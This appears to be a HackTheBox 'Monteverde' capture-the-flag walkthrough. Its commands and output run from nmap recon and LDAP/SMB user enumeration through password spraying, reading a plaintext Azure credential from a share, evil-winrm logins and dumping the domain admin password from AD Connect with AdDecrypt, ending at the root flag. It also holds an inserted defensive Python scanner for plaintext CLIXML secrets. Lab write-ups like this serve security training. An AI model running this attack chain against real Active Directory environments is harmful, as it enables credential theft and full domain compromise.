Opening move: nmap recon. Ports 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268 and 3269 are all open, so this looks like a Domain Controller.

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.172
------------------------------------------------------------
Scanning target 10.10.10.172
Time started: 2024-02-01 06:34:00.337693
------------------------------------------------------------
Port 53 is open
Port 139 is open
Port 135 is open
Port 88 is open
Port 389 is open
Port 445 is open
Port 464 is open
Port 593 is open
Port 636 is open
Port 3268 is open
Port 3269 is open
Port 5985 is open
Port 9389 is open
Port 49667 is open
Port 49674 is open
Port 49673 is open
Port 49675 is open
Port 49737 is open
Port scan completed in 0:01:38.771209
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p53,139,135,88,389,445,464,593,636,3268,3269,5985,9389,49667,49674,49673,49675,49737 -sV -sC -T4 -Pn -oA 10.10.10.172 10.10.10.172
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p53,139,135,88,389,445,464,593,636,3268,3269,5985,9389,49667,49674,49673,49675,49737 -sV -sC -T4 -Pn -oA 10.10.10.172 10.10.10.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-01 06:35 EST
Nmap scan report for 10.10.10.172
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-01 11:35:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-01T11:36:44
|_  start_date: N/A
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.98 seconds
------------------------------------------------------------
Combined scan completed in 0:03:31.063994
Press enter to quit...

Add the domain name found by the scan to /etc/hosts:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ sudo -i                
[sudo] password for kali: 
┌──(root㉿kali)-[~]
└─# echo "10.10.10.172 megabank.local">> /etc/hosts

┌──(root㉿kali)-[~]
└─# exit

Since port 445 is open and the box is a DC, run enum4linux-ng 10.10.10.172 -oJ out, which writes out.json:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ls    
10.10.10.172  out.json

Viewing out.json in a browser shows a number of accounts:

Put those accounts into users.txt:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ vim users.txt                     

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat users.txt   
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

The ldapsearch worked and A LOT of information was dumped. So much information that I had to redirect the output to a file for easier parsing. ldapsearch gives the same result as enum4linux, but it feels nicer to work with.

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b "dc=megabank,dc=local" > ldapsearch.txt

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat ldapsearch.txt | grep  'userPrincipalName'
userPrincipalName: mhope@MEGABANK.LOCAL
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
userPrincipalName: svc-ata@MEGABANK.LOCAL
userPrincipalName: svc-bexec@MEGABANK.LOCAL
userPrincipalName: svc-netapp@MEGABANK.LOCAL
userPrincipalName: dgalanos@MEGABANK.LOCAL
userPrincipalName: roleary@MEGABANK.LOCAL
userPrincipalName: smorgan@MEGABANK.LOCAL

Try a zone transfer and an AS-REP roast, but neither works:

dig @10.10.10.172 AXFR megabank.local

GetNPUsers.py megabank.local/ -dc-ip 10.10.10.172

Kerberoasting is no use either, and no account has pre-authentication disabled. Try whether any share allows anonymous login (smbclient) or whether RID cycling is possible, but neither seems to work.

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient -L 10.10.10.172 -N
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ rpcclient 10.10.10.172 -N
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Since the usual tricks all fail, what is left is to guess each account's SMB password. I tried installing legba for this (the install failed).

First build the password file with cat ./users.txt > wordlist.txt; cat /usr/share/seclists/Passwords/Leaked-Databases/rockyou-25.txt >> wordlist.txt. The usernames go into the wordlist too, because some people set their password equal to their username; rockyou-25 is a small wordlist, so test with the small one first and move on to a bigger one only if nothing hits.

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ /home/kali/Spray/spray.sh -smb 10.10.10.172 users.txt wordlist.txt 700 35 megabank.local

Spray 2.1 the Password Sprayer by Jacob Wilkin(Greenwolf)

21:33:39 Spraying with password: Users Username
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[*] user Guest%Guest [*] user AAD_987d7f2f57d2%AAD_987d7f2f57d2 [*] user mhope%mhope [*] user SABatchJobs%SABatchJobs Account Name: SABatchJobs, Authority Name: MEGABANK
[*] user svc-ata%svc-ata [*] user svc-bexec%svc-bexec [*] user svc-netapp%svc-netapp [*] user dgalanos%dgalanos [*] user roleary%roleary [*] user smorgan%smorgan 
21:33:52 Spraying with password: Guest

The line user SABatchJobs%SABatchJobs Account Name: SABatchJobs, Authority Name: MEGABANK carries full account details, which means the guess succeeded: SABatchJobs uses its username as its password. With credentials in hand, try Kerberoasting again, which still gets nothing, but listing shares now works:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ impacket-GetUserSPNs -request 'megabank.local/SABatchJobs:SABatchJobs' -dc-ip 10.10.10.172
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient -L 10.10.10.172 -U "megabank.local/SABatchJobs%SABatchJobs"

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There are two custom shares, "azure_uploads" and "users". Next, there are two disk drives on this host, "C", which is default, but also "E". Finally, SYSVOL is interesting if this is a version of Windows Server that uses the Groups.xml file.

In short, the non-default shares are "azure_uploads" and "users$", and E is not a default drive either. Inside users$ there is a file azure.xml; download it:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ smbclient "\\\\10.10.10.172\\users$" -U "megabank.local/SABatchJobs"
Password for [MEGABANK.LOCAL\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

        31999 blocks of size 4096. 28979 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

\dgalanos
  .                                   D        0  Fri Jan  3 08:12:30 2020
  ..                                  D        0  Fri Jan  3 08:12:30 2020

\mhope
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

\roleary
  .                                   D        0  Fri Jan  3 08:10:30 2020
  ..                                  D        0  Fri Jan  3 08:10:30 2020

\smorgan
  .                                   D        0  Fri Jan  3 08:10:24 2020
  ..                                  D        0  Fri Jan  3 08:10:24 2020

        31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)

Connecting to the other share with smbclient "\\\\10.10.10.172\\azure_uploads" -U "megabank.local/SABatchJobs" shows that azure_uploads is empty. So look at the azure.xml we just downloaded:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ cat azure.xml                                                                                         
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
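As an added example (not part of the original post or of any tool it uses), the Python script below is the defender-side counterpart of this find: it scans exported CLIXML files, the format Export-Clixml writes, for properties that hold secrets in the clear. It decodes the byte-order mark that shows up as stray bytes at the top of the cat output (Windows PowerShell 5.1's Export-Clixml writes UTF-16LE by default), then reports each secret-named property together with whether it is a plain <S> string, as in the PSADPasswordCredential above, or a DPAPI-protected <SS> SecureString. The sample document, the account name svc-example and all secret values are constructed.

```python
"""Flag secret-bearing properties in exported PowerShell CLIXML files.

Added example; not code from the original post or from any tool it uses.
In CLIXML an ordinary .NET string property serialises as <S N="...">, while
a SecureString serialises as <SS N="..."> (DPAPI-protected, readable only by
the exporting user on the exporting machine). PSADPasswordCredential keeps
its password as a plain string, so Export-Clixml puts it on disk in the clear.
"""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
SECRET_PROP_NAMES = {"password", "secret", "clientsecret", "accesskey", "token"}

PLACEHOLDER_SECRET = "PLACEHOLDER-not-a-real-secret"   # constructed value

# Constructed to mirror the layout of the azure.xml found in users$, plus a
# second object showing how a PSCredential serialises its SecureString.
# Account name and the hex blob are made up.
SAMPLE_CLIXML = (
    '<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">\n'
    '  <Obj RefId="0">\n'
    '    <TN RefId="0">\n'
    '      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>\n'
    '      <T>System.Object</T>\n'
    '    </TN>\n'
    '    <Props>\n'
    '      <DT N="StartDate">2020-01-03T05:35:00-08:00</DT>\n'
    '      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>\n'
    f'      <S N="Password">{PLACEHOLDER_SECRET}</S>\n'
    '    </Props>\n'
    '  </Obj>\n'
    '  <Obj RefId="1">\n'
    '    <TN RefId="1"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>\n'
    '    <Props>\n'
    '      <S N="UserName">MEGABANK\\svc-example</S>\n'
    '      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0000</SS>\n'
    '    </Props>\n'
    '  </Obj>\n'
    '</Objs>\n'
).encode("utf-16")   # Windows PowerShell 5.1 writes UTF-16LE with a BOM


def decode_clixml(raw: bytes) -> str:
    """Pick the codec from the BOM; both codecs drop the BOM so ET can parse."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def find_secret_props(xml_text: str) -> list:
    """One finding per secret-named property of every serialised object."""
    root = ET.fromstring(xml_text)
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        tn = obj.find(f"{{{PS_NS}}}TN")
        type_name = tn[0].text if tn is not None and len(tn) else "(unknown)"
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            if name.lower() not in SECRET_PROP_NAMES:
                continue
            tag = prop.tag.replace(f"{{{PS_NS}}}", "")
            kind = {"S": "plaintext", "SS": "securestring"}.get(tag, tag)
            findings.append({"type": type_name, "prop": name, "kind": kind,
                             "length": len(prop.text or "")})
    return findings


def scan_bytes(raw: bytes) -> list:
    """Decode a file's bytes and return all secret-bearing properties."""
    return find_secret_props(decode_clixml(raw))


def plaintext_findings(raw: bytes) -> list:
    """Only the findings that are readable by anyone who can open the file."""
    return [f for f in scan_bytes(raw) if f["kind"] == "plaintext"]


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CLIXML
    for f in scan_bytes(raw):
        print(f"{f['kind']:12} {f['type']}.{f['prop']} ({f['length']} chars)")
```

Run it with no argument to scan the embedded sample, or pass a file path. Since a PSADPasswordCredential always serialises its password as a plain string, the practical control is to keep such exports off user-reachable shares entirely rather than to rely on SecureString protection.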

There is a password, but nothing says whose it is, so try it against every user with crackmapexec:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt  -p 4n0therD4y@n0th3r$
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

With the password confirmed as mhope's, log in with evil-winrm and check which groups he belongs to. One of them stands out: Azure Admins.

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> net user mhope /domain
User name                    mhope
Full Name                    Mike Hope
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/2/2020 3:40:05 PM
Password expires             Never
Password changeable          1/3/2020 3:40:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory               \\monteverde\users$\mhope
Last logon                   2/2/2024 6:54:41 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Azure Admins         *Domain Users
The command completed successfully.

net localgroup lists the local groups on this machine:

*Evil-WinRM* PS C:\Users\mhope\Documents> net localgroup

Aliases for \\MONTEVERDE

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*ADSyncAdmins
*ADSyncBrowse
*ADSyncOperators
*ADSyncPasswordSet
*Allowed RODC Password Replication Group
...

A few of these stand out. Googling them gives the results below; the interesting one is highlighted in blue in the screenshot:

Then google "AD Connect" to see whether there is a known attack against it. There is, but the first three search results (below) all need their scripts modified or they fail; we go with the fourth one (highlighted below):

Read the readme, paying attention to the highlighted parts in the screenshots above and below:

Download it to the attack machine and unzip it.

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ ls
AdDecrypt  AdDecrypt.exe  AdDecrypt.zip  ADSyncDecrypt.ps1  Azure-ADConnect.ps1  azure.xml  ldapsearch.txt  logs  mcrypt.dll  out.json  users.txt  wordlist.txt

Upload the extracted exe and dll to the target, then, as the readme says, cd to C:\Program Files\Microsoft Azure AD Sync\Bin first and run AdDecrypt.exe -FullSQL from there:

*Evil-WinRM* PS C:\Users\mhope\Documents> upload AdDecrypt.exe

Info: Uploading /home/kali/HTB/monteverde/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe

Data: 19796 bytes of 19796 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> upload mcrypt.dll

Info: Uploading /home/kali/HTB/monteverde/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll

Data: 445664 bytes of 445664 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Documents> cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

With the password recovered, log in with evil-winrm:

┌──(kali㉿kali)-[~/HTB/monteverde]
└─$ evil-winrm -i 10.10.10.172 -u 'administrator' -p 'd0m@in4dminyeah!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/2/2024   6:21 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
f6449354843443fa754e61b9ccdae2bc

Reference

HacktheBox – Monteverde - Juggernaut Pentesting Blog

https://medium.com/@roopesh.sg7/walk-through-htb-monteverde-43ff31542a92

GitHub - VbScrub/AdSyncDecrypt


#account-enumeration-with-enum4linux #account-enumeration-with-ldapsearch #wordlist-creation-tips #smb-password-spraying-with-spray.sh(password-list,user-list) #share-enumeration-with-smbclient(domain,IP,credentials) #smb-password-guessing-with-crackmapexec(one-password,user-list) #list-a-user's-group-membership(windows) #list-local-groups #AD-Connect-abuse-with-github-VbScrub/AdSyncDecrypt






